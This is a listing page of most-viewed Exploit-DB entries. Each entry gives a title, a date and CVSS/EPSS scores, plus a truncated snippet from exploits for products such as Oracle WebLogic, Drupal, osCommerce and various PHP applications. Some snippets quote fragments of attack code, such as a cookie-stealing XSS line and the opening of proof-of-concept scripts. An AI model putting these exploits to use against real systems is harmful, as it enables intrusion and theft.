Exploitdb - Most viewed

47884 matches found

Exploit DB
added 2019/05/08 12:0 a.m. | 272 views

Oracle Weblogic Server - 'AsyncResponseService' Deserialization Remote Code Execution (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Oracle Weblogic Server Deserialization RCE - AsyncResponseService ', 'Description' = %q An unauthenticated attacker with network access to the...

9.8 CVSS | 9 AI score | 0.94468 EPSS
Exploits: 35

Exploit DB
added 2019/02/28 12:0 a.m. | 272 views

Feng Office 3.7.0.5 - Remote Command Execution (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' require 'uri' class MetasploitModule 'Feng Office 3.7.0.5 - Unauthenticated Remote Command Execution', 'Description' = %q This module exploits arbitrar...

7.4 AI score
Exploits: 0

Exploit DB
added 2014/09/08 12:0 a.m. | 272 views

osCommerce 2.3.4 - Multiple Vulnerabilities

Title: osCommerce 2.3.4 - Multiple vulnerabilities Date: 10.07.14 Affected versions: = 2.3.4 latest atm Vendor: oscommerce.com Tested on: Apache 2.2.22 at Debian Contact: smash at devilteam.pl Cross Site Scripting 1. Reflected XSS - Send Email Vulnerable parameters - customersemailaddress &...

7 AI score
Exploits: 0

Exploit DB
added 2004/04/30 12:0 a.m. | 272 views

Coppermine Photo Gallery 1.2.0 RC4 - 'init.inc.php' Remote File Inclusion

source: https://www.securityfocus.com/bid/10253/info Coppermine Photo Gallery is reported prone to multiple input-validation vulnerabilities, some of which may lead to arbitrary command execution. These issues occur because the application fails to properly sanitize and validate user-supplied inp...

7 AI score
Exploits: 0

Exploit DB
added 2025/04/16 12:0 a.m. | 271 views

ASUS ASMB8 iKVM 1.14.51 - Remote Code Execution (RCE)

Exploit Title: ASUS ASMB8 iKVM 1.14.51 - Remote Code Execution RCE Date: 2023-02-16 Exploit Author: [email protected] for NetworkSEC NWSSA-002-2023, SC Vendor Homepage: https://servers.asus.com/search?q=ASMB8 Version/Model: ASMB8 iKVM Firmware = 1.14.51 probably others Tested on: Linux...

9.8 CVSS | 9.4 AI score | 0.70087 EPSS
Exploits: 6

Exploit DB
added 2025/04/16 12:0 a.m. | 271 views

Car Rental Project 1.0 - Remote Code Execution

Exploit Title: Car Rental Project 1.0 - Remote Code Execution Date: 1/3/2020 Exploit Author: FULLSHADE, SC Vendor Homepage: https://phpgurukul.com/ Software Link: https://phpgurukul.com/car-rental-project-php-mysql-free-download/ Version: 1.0 Tested on: Windows CVE : CVE-2020-5509...

7.2 CVSS | 7.4 AI score | 0.14026 EPSS
Exploits: 4

Exploit DB
added 2023/07/19 12:0 a.m. | 271 views

CmsMadeSimple v2.2.17 - session hijacking via Server-Side Template Injection (SSTI)

Exploit Title: CmsMadeSimple v2.2.17 - session hijacking via Server-Side Template Injection SSTI Application: CmsMadeSimple Version: v2.2.17 Bugs: SSTI Technology: PHP Vendor URL: https://www.cmsmadesimple.org/ Software Link: https://www.cmsmadesimple.org/downloads/cmsms Date of found: 13-07-2023...

7.4 AI score
Exploits: 0

Exploit DB
added 2023/07/19 12:0 a.m. | 271 views

CmsMadeSimple v2.2.17 - Remote Code Execution (RCE)

Exploit Title: CmsMadeSimple v2.2.17 - Remote Code Execution RCE Application: CmsMadeSimple Version: v2.2.17 Bugs: Remote Code ExecutionRCE Technology: PHP Vendor URL: https://www.cmsmadesimple.org/ Software Link: https://www.cmsmadesimple.org/downloads/cmsms Date of found: 12-07-2023 Author:...

7.4 AI score
Exploits: 0

Exploit DB
added 2023/05/02 12:0 a.m. | 271 views

PHP Restaurants 1.0 - SQLi Authentication Bypass & Cross Site Scripting

Exploit Title: PHP Restaurants 1.0 - SQLi Authentication Bypass & Cross Site Scripting XSS Google Dork: None Date: 4/26/2023 Exploit Author: Or4nG.M4n Vendor Homepage: https://github.com/jcwebhole Software Link: https://github.com/jcwebhole/phprestaurants Version: 1.0 functions.php function login...

7.4 AI score
Exploits: 0

Exploit DB
added 2023/04/08 12:0 a.m. | 271 views

Restaurant Management System 1.0 - SQL Injection

Exploit Title: Restaurant Management System 1.0 - SQL Injection Date: 2023-03-20 Exploit Author: calfcrusher [email protected] Vendor Homepage: https://www.sourcecodester.com/users/lewa Software Link: https://www.sourcecodester.com/php/11815/restaurant-management-system.html Version: 1.0...

7.4 AI score
Exploits: 0

Exploit DB
added 2023/04/06 12:0 a.m. | 271 views

Purchase Order Management-1.0 - Local File Inclusion

Title: Purchase Order Management-1.0 - Local File Inclusion Author: nu11secur1ty Date: 03.06.2023 Vendor: https://www.sourcecodester.com/user/257130/activity Software: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html Reference:...

7.4 AI score
Exploits: 0

Exploit DB
added 2023/03/30 12:0 a.m. | 271 views

4images 1.9 - Remote Command Execution (RCE)

Exploit Title: 4images 1.9 - Remote Command Execution RCE Exploit Author: Andrey Stoykov Software Link: https://www.4homepages.de/download-4images Version: 1.9 Tested on: Ubuntu 20.04 To reproduce do the following: 1. Login as administrator user 2. Browse to "General" - " Edit Templates" - "Selec...

7.4 AI score
Exploits: 0

Exploit DB
added 2022/05/11 12:0 a.m. | 271 views

WebTareas 2.4 - Blind SQLi (Authenticated)

Exploit Title: WebTareas 2.4 - Blind SQLi Authenticated Date: 04/20/2022 Exploit Author: Behrad Taher Vendor Homepage: https://sourceforge.net/projects/webtareas/ Version: 2.4p3 CVE : CVE-2021-43481 The script takes 3 arguments: IP, user ID, session ID Example usage: python3 webtareassqli.py...

9.8 CVSS | 9.8 AI score | 0.0063 EPSS
Exploits: 5

Exploit DB
added 2022/04/07 12:0 a.m. | 271 views

Opmon 9.11 - Cross-site Scripting

Exploit Title: Opmon 9.11 - Cross-site Scripting Date: 2021-06-01 Exploit Author: p3tryx Vendor Homepage: https://www.opservices.com.br/monitoramento-real-time Version: 9.11 Tested on: Chrome, IE and Firefox CVE : CVE-2021-43009 URL POC: alertdocument.cookie; var i=new Image;...

6.1 CVSS | 7 AI score | 0.00224 EPSS
Exploits: 4

Exploit DB
added 2022/02/16 12:0 a.m. | 271 views

H3C SSL VPN - Username Enumeration

Exploit Title: H3C SSL VPN - Username Enumeration Exploit Author: LiquidWorm H3C SSL VPN Username Enumeration Vendor: Hangzhou H3C Technologies Co. | New H3C Technologies Co., Ltd. Product web page: https://www.h3c.com Affected version: n/a Summary: H3C SSL VPN is a secure VPN system based on SSL...

7.4 AI score
Exploits: 0

Exploit DB
added 2022/02/02 12:0 a.m. | 271 views

WordPress Plugin Product Slider for WooCommerce 1.13.21 - Cross Site Scripting (XSS)

Exploit Title: WordPress Plugin Product Slider for WooCommerce 1.13.21 - Cross Site Scripting XSS Date: 3/16/2021 Author: 0xB9 Software Link: https://wordpress.org/plugins/woocommerc...ts-slider/ Version: 1.13.21 Tested on: Windows 10 CVE: CVE-2021-24300 1. Description: This plugin is a easy...

6.1 CVSS | 6.5 AI score | 0.03405 EPSS
Exploits: 5

Exploit DB
added 2022/01/05 12:0 a.m. | 271 views

Movie Rating System 1.0 - SQLi to RCE (Unauthenticated)

Exploit Title: Movie Rating System 1.0 - SQLi to RCE Unauthenticated Date: 22/12/2021 Exploit Author: Tagoletta Tağmaç Software Link: https://www.sourcecodester.com/php/15104/sentiment-based-movie-rating-system-using-phpoop-free-source-code.html Version: 1.0 Tested on: Ubuntu This exploit only...

7.4 AI score
Exploits: 0

Exploit DB
added 2021/09/22 12:0 a.m. | 271 views

Cloudron 6.2 - 'returnTo ' Cross Site Scripting (Reflected)

Exploit Title: Cloudron 6.2 - 'returnTo ' Cross Site Scripting Reflected Date: 10.06.2021 Exploit Author: Akıner Kısa Vendor Homepage: https://cloudron.io Software Link: https://www.cloudron.io/get.html Version: 6.3 CVE : CVE-2021-40868 Proof of Concept: 1. Go to...

6.1 CVSS | 6.4 AI score | 0.26974 EPSS
Exploits: 3

Exploit DB
added 2021/08/23 12:0 a.m. | 271 views

RaspAP 2.6.6 - Remote Code Execution (RCE) (Authenticated)

Exploit Title: RaspAP 2.6.6 - Remote Code Execution RCE Authenticated Date: 23.08.2021 Exploit Author: Moritz Gruber Vendor Homepage: https://raspap.com/ Software Link: https://github.com/RaspAP/raspap-webgui Version: 2.6.6 Tested on: Linux raspberrypi 5.10.52-v7+ import requests from requests.ap...

7.4 AI score
Exploits: 0

Exploit DB
added 2021/02/18 12:0 a.m. | 271 views

Batflat CMS 1.3.6 - Remote Code Execution (Authenticated)

Exploit Title: Batflat CMS 1.3.6 - Remote Code Execution Authenticated Date: 2020-12-27 Exploit Author: mari0x00 Vendor Homepage: https://batflat.org/ Software Link: https://github.com/sruupl/batflat/archive/master.zip Description:...

7.2 CVSS | 7 AI score | 0.05032 EPSS
Exploits: 4

Exploit DB
added 2020/09/28 12:0 a.m. | 271 views

MSI Ambient Link Driver 1.0.0.8 - Local Privilege Escalation

/ Exploit Title: MSI Ambient Link Driver 1.0.0.8 - Local Privilege Escalation Date: 2020-09-24 Exploit Author: Matteo Malvica Vendor Homepage: https://www.msi.com Software Link: https://msi.gm/ABLTMNB Driver: MSIO64.sys SHA256: 525D9B51A80CA0CD4C5889A96F857E73F3A80DA1FFBAE59851E0F51BDFB0B6CD...

7.8 CVSS | 7.9 AI score | 0.12817 EPSS
Exploits: 4

Exploit DB
added 2020/07/06 12:0 a.m. | 271 views

RSA IG&L Aveksa 7.1.1 - Remote Code Execution

Exploit Title: RSA IG&L Aveksa 7.1.1 - Remote Code Execution Date: 2019-04-16 Exploit Author: Jakub Palaczynski, Lukasz Plonka Vendor Homepage: https://www.rsa.com/ Version: 7.1.1, prior to P02 CVE : CVE-2019-3759 all vulnerable versions can be found at...

8.1 CVSS | 7.3 AI score | 0.01233 EPSS
Exploits: 3

Exploit DB
added 2020/05/26 12:0 a.m. | 271 views

StreamRipper32 2.6 - Buffer Overflow (PoC)

Exploit Title: StreamRipper32 2.6 - Buffer Overflow PoC Date: 2020-05-14 Exploit Author: Andy Bowden Tested On: Win10 x64 Download Link: http://streamripper.sourceforge.net/sr32/StreamRipper3226.exe Vendor Page: http://streamripper.sourceforge.net/ Version: 2.6 Steps To Reproduce: Double click on...

7.4 AI score
Exploits: 0

Exploit DB
added 2019/11/26 12:0 a.m. | 271 views

InduSoft Web Studio 8.1 SP1 - "Atributos" Denial of Service (PoC)

Exploit Title: InduSoft Web Studio 8.1 SP1 - "Atributos" Denial of Service PoC Discovery by: chuyreds Discovery Date: 2019-11-23 Vendor Homepage: http://www.indusoft.com/ Software Link : http://www.indusoft.com/Products-Downloads Tested Version: 8.1 SP1 Vulnerability Type: Denial of Service DoS...

7.4 AI score
Exploits: 0

Exploit DB
added 2019/06/26 12:0 a.m. | 271 views

Mozilla Spidermonkey - IonMonkey 'Array.prototype.pop' Type Confusion

The following program found through fuzzing and manually modified crashes Spidermonkey built from the current beta channel and Firefox 66.0.3 current stable: // Run with --no-threads for increased reliability const v4 = a: 0, a: 1, a: 2, a: 3, a: 4; function v7v8,v9 if v4.length == 0 v43 = a: 5; ...

7.4 AI score
Exploits: 0

Exploit DB
added 2019/01/21 12:0 a.m. | 271 views

Kepler Wallpaper Script 1.1 - SQL Injection

Exploit Title: Kepler Wallpaper Script 1.1 - SQL Injection Dork: N/A Date: 2019-01-19 Exploit Author: Ihsan Sencan Vendor Homepage: https://keplerwallpapers.online/ Software Link: https://codeclerks.com/PHP/1559/Kepler-Wallpaper-Script Version: 1.1 Category: Webapps Tested on: WiN7x64/KaLiLinuXx6...

7 AI score
Exploits: 0

Exploit DB
added 2018/04/13 12:0 a.m. | 271 views

Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)

!/usr/bin/env import sys import requests print '' print ' Proof-Of-Concept for CVE-2018-7600' print ' by Vitalii Rudnykh' print ' Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders' print ' https://github.com/a2u/CVE-2018-7600' print '' print 'Provided only for educational or informatio...

9.8 CVSS | 10 AI score | 0.94489 EPSS
Exploits: 45

Exploit DB
added 2011/12/11 12:0 a.m. | 271 views

Xoops 2.5.4 - Blind SQL Injection

------------------------------------------ Xoops 2.5.4 Blind SQL Injection ------------------------------------------ Dork: "Powered by XOOPS 2.5.4" Download: http://sourceforge.net/projects/xoops/ Date: 10/12/2011 Author: blkhtc0rp Mail: blkhtc0rpatyahoodotcom Tested on: Freebsd 8 and Debian...

7.4 AI score
Exploits: 0

Exploit DB
added 2008/04/02 12:0 a.m. | 271 views

HP OpenView Network Node Manager (OV NNM) 7.5.1 - 'OVAS.exe' Overflow (SEH)

!/usr/bin/python HP OpenView NNM 7.5.1 OVAS.EXE Pre Authentication SEH Overflow Tested on Windows 2003 Server SP1. Coded by Mati Aharoni muts..at..offensive-security.com http://www.offensive-security.com/0day/hp-nnm-ov.py.txt shameless plug This vulnerability was found, analysed and exploited as...

7 AI score
Exploits: 0

Exploit DB
added 2025/04/15 12:0 a.m. | 270 views

ABB Cylon Aspect 3.08.02 (escDevicesUpdate.php) - Denial of Service (DOS)

ABB Cylon Aspect 3.08.02 escDevicesUpdate.php Off-by-One Config Write DoS Vendor: ABB Ltd. Product web page: https://www.global.abb Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio Firmware: =3.08.02 Summary: ASPECT is an award-winning scalable building energy...

7.7 CVSS | 7 AI score | 0.08272 EPSS
Exploits: 3

Exploit DB
added 2024/05/31 12:0 a.m. | 270 views

Check Point Security Gateway - Information Disclosure (Unauthenticated)

Exploit Title: Check Point Security Gateway - Information Disclosure Unauthenticated Exploit Author: Yesith Alvarez Vendor Homepage: https://support.checkpoint.com/results/sk/sk182336 Version: R77.20 EOL, R77.30 EOL, R80.10 EOL, R80.20 EOL, R80.20.x, R80.20SP EOL, R80.30 EOL, R80.30SP EOL, R80.40...

8.6 CVSS | 8.9 AI score | 0.94342 EPSS
Exploits: 52

Exploit DB
added 2024/05/13 12:0 a.m. | 270 views

Chyrp 2.5.2 - Stored Cross-Site Scripting (XSS)

Chyrp 2.5.2 - Stored Cross-Site Scripting XSS Date: 2024-04-24 Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://github.com/chyrp/ Software Link: https://github.com/chyrp/chyrp/archive/refs/tags/v2.5.2.zip Version: 2.5.2 Tested on: MacOS Steps to Reproduce - Login from the address:...

7 AI score
Exploits: 0

Exploit DB
added 2024/03/03 12:0 a.m. | 270 views

Petrol Pump Management Software v1.0 - Remote Code Execution via File Upload

Exploit Title: Petrol Pump Management Software v1.0 - Remote Code Execution via File Upload Date: 01-03-2024 Exploit Author: Shubham Pandey Vendor Homepage: https://www.sourcecodester.com Software Link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html...

9.8 CVSS | 6.7 AI score | 0.17028 EPSS
Exploits: 4

Exploit DB
added 2023/05/02 12:0 a.m. | 270 views

GLPI 9.5.7 - Username Enumeration

Exploit Title: GLPI 9.5.7 - Username Enumeration Date: 04/29/2023 Author: Rafael B. Vendor Homepage: https://glpi-project.org/pt-br/ Affected Versions: GLPI version 9.1 = 9.5.7 Software: https://github.com/glpi-project/glpi/releases/download/9.5.7/glpi-9.5.7.tgz import requests from bs4 import...

7.4 AI score
Exploits: 0

Exploit DB
added 2023/04/10 12:0 a.m. | 270 views

Online Computer and Laptop Store 1.0 - Remote Code Execution (RCE)

!/usr/bin/env python3 Exploit Title: Online Computer and Laptop Store 1.0 - Remote Code Execution RCE Date: 09/04/2023 Exploit Author: Matisse Beckandt Backendt Vendor Homepage:...

9.8 CVSS | 9.7 AI score | 0.03977 EPSS
Exploits: 4

Exploit DB
added 2022/03/30 12:0 a.m. | 270 views

WordPress Plugin Curtain 1.0.2 - Cross-site Request Forgery (CSRF)

Exploit Title: WordPress Plugin Curtain 1.0.2 - Cross-site Request Forgery CSRF Date: 24-03-2022 Exploit Author: Hassan Khan Yusufzai - Splint3r7 Vendor Homepage: https://wordpress.org/plugins/curtain/ Version: 1.0.2 Tested on: Firefox Summary: Cross site forgery vulnerability has been identified...

7.4 AI score
Exploits: 0

Exploit DB
added 2022/01/12 12:0 a.m. | 270 views

WordPress Plugin Frontend Uploader 1.3.2 - Stored Cross Site Scripting (XSS) (Unauthenticated)

Exploit Title: WordPress Plugin Frontend Uploader 1.3.2 - Stored Cross Site Scripting XSS Unauthenticated Date: 10/01/2022 Exploit Author: Veshraj Ghimire Vendor Homepage: https://wordpress.org/plugins/frontend-uploader/ Software Link: https://plugins.trac.wordpress.org/browser/frontend-uploader/...

6.1 CVSS | 6.3 AI score | 0.4059 EPSS
Exploits: 6

Exploit DB
added 2021/10/14 12:0 a.m. | 270 views

SolarWinds Kiwi CatTools 3.11.8 - Unquoted Service Path

Exploit Title: SolarWinds Kiwi CatTools 3.11.8 - Unquoted Service Path Exploit Author: Mert DAŞ Version: 3.11.8 Date: 14.10.2021 Vendor Homepage: https://www.solarwinds.com/ Tested on: Windows 10 Step to discover Unquoted Service Path : -------------------------------------- C:\Users\Mertsc qc...

7.4 AI score
Exploits: 0

Exploit DB
added 2021/10/01 12:0 a.m. | 270 views

Drupal Module MiniorangeSAML 8.x-2.22 - Privilege escalation

Exploit Title: Drupal Module MiniorangeSAML 8.x-2.22 - Privilege escalation via XML Signature Wrapping Date: 09/07/2021 Exploit Author: Cristian 'void' Giustini Vendor Homepage: https://www.miniorange.com/ Software Link: https://www.drupal.org/project/miniorangesaml Version: 8.x-2.22 REQUIRED...

7.4 AI score
Exploits: 0

Exploit DB
added 2021/08/13 12:0 a.m. | 270 views

Care2x Open Source Hospital Information Management 2.7 Alpha - 'Multiple' Stored XSS

Exploit Title: Care2x Open Source Hospital Information Management 2.7 Alpha - 'Multiple' Stored XSS Date: 13.08.2021 Exploit Author: securityforeveryone.com Author Mail: helloATsecurityforeveryone.com Vendor Homepage: https://care2x.org Software Link: https://sourceforge.net/projects/care2002/...

7.4 AI score
Exploits: 0

Exploit DB
added 2021/06/09 12:0 a.m. | 270 views

Intelbras Router RF 301K - 'DNS Hijacking' Cross-Site Request Forgery (CSRF)

Exploit Title: Intelbras Router RF 301K - 'DNS Hijacking' Cross-Site Request Forgery CSRF Date: 01/05/2021 Exploit Author: Rodolfo Mariano Version: Firmware 1.1.2-1.1.5 CVE: 2021-32403 Exploit Code: document.forms0.submit;...

7.4 AI score
Exploits: 0

Exploit DB
added 2021/02/15 12:0 a.m. | 270 views

Tasks 9.7.3 - Insecure Permissions

Exploit Title: Tasks 9.7.3 - Insecure Permissions Date: 18th of July, 2020 Exploit Author: Lyhin's Lab Detailed Bug Description: https://lyhinslab.org/index.php/2020/07/18/how-the-white-box-hacking-works-ok-google-i-wanna-pwn-this-app/ Vendor Homepage: https://tasks.org/ Software Link:...

7.4 AI score
Exploits: 0

Exploit DB
added 2021/01/22 12:0 a.m. | 270 views

Selea Targa IP OCR-ANPR Camera - CSRF Add Admin

Exploit Title: Selea Targa IP OCR-ANPR Camera - CSRF Add Admin Date: 07.11.2020 Exploit Author: LiquidWorm Vendor Homepage: https://www.selea.com Selea Targa IP OCR-ANPR Camera CSRF Add Admin Exploit Vendor: Selea s.r.l. Product web page: https://www.selea.com Affected version: Model: iZero Targa...

7.4 AI score
Exploits: 0

Exploit DB
added 2020/11/09 12:0 a.m. | 270 views

OKI sPSV Port Manager 1.0.41 - 'sPSVOpLclSrv' Unquoted Service Path

Exploit Title: OKI sPSV Port Manager 1.0.41 - 'sPSVOpLclSrv' Unquoted Service Path Date: 2020-11-08 Exploit Author: Julio Aviña Vendor Homepage: https://www.oki.com/ Software Link: https://www.oki.com/mx/printing/download/sPSV0100412270910.exe Software Version: 1.0.41 File Version: 1.4.2.0 Tested...

7.4 AI score
Exploits: 0

Exploit DB
added 2020/02/26 12:0 a.m. | 270 views

PhpIX 2012 Professional - 'id' SQL Injection

Title: PhpIX 2012 Professional - 'id' SQL Injection Date: 2020-02-26 Author: indoushka Tested on : windows 10 Français V.Pro / browser : Mozilla firefox 69.032-bit Vendor : http://www.allhandsmarketing.com/ poc : + Dorking İn Google Or Other Search Enggine. + /productdetail.php?id=448578 ====|...

7.4 AI score
Exploits: 0

Exploit DB
added 2020/01/20 12:0 a.m. | 270 views

Sysax Multi Server 5.50 - Denial of Service (PoC)

Exploit Title: Sysax Multi Server 5.50 - Denial of Service PoC Google Dork: NA Date: 2020-01-20 Exploit Author: Shailesh Kumavat Vendor Homepage: https://www.sysax.com/ Software Link: https://www.sysax.com/download.htmsysaxserv Version: Sysax Multi Server 5.50 Tested on: WIndow 7 CVE : if...

7.4 AI score
Exploits: 0

Exploit DB
added 2019/11/05 12:0 a.m. | 270 views

JavaScriptCore - Type Confusion During Bailout when Reconstructing Arguments Objects

The following sample was found by Fuzzilli and then slightly modified. It crashes JSC in debug builds: function main const v2 = 1337,1337; const v3 = 1337,v2,v2,0; Object.proto = v3; for let v10 = 0; v10 inheritscell-JSC::JSCell::vm, std...

7 AI score
Exploits: 0

Exploit DB
added 2019/10/14 12:0 a.m. | 270 views

ActiveFax Server 6.92 Build 0316 - 'POP3 Server' Denial of Service

Exploit Title: ActiveFax Server 6.92 Build 0316 - 'POP3 Server' Denial of Service Date: 2019-10-12 Vendor Homepage: https://www.actfax.com/ Software Link : https://www.actfax.com/download/actfaxsetupx64ge.exe Exploit Author: Achilles Tested Version: 6.92 Tested on: Windows 7 x64 Vulnerability Typ...

7.4 AI score
Exploits: 0

Exploit DB
added 2019/09/27 12:0 a.m. | 270 views

WordPress Theme Zoner Real Estate - 4.1.1 Persistent Cross-Site Scripting

Exploit Title: WordPress Theme Zoner Real Estate - 4.1.1 Persistent Cross-Site Scripting Google Dork: inurl:/wp-content/themes/zoner/ Date: 2019-09-24 Exploit Author: m0ze Vendor Homepage: https://fruitfulcode.com/ Software Link:...

7.4 AI score
Exploits: 0

Exploit DB
added 2019/09/09 12:0 a.m. | 270 views

Enigma NMS 65.0.0 - SQL Injection

-------------------------------------------------------------------- Exploit Title: Enigma NMS searchpattern SQL Injection Date: 21 July 2019 Author: Mark Cross @xerubus | mogozobo.com Vendor: NETSAS Pty Ltd Vendor Homepage: https://www.netsas.com.au/ Software Link:...

9 CVSS | 9 AI score | 0.0134 EPSS
Exploits: 5

Total number of security vulnerabilities: 5000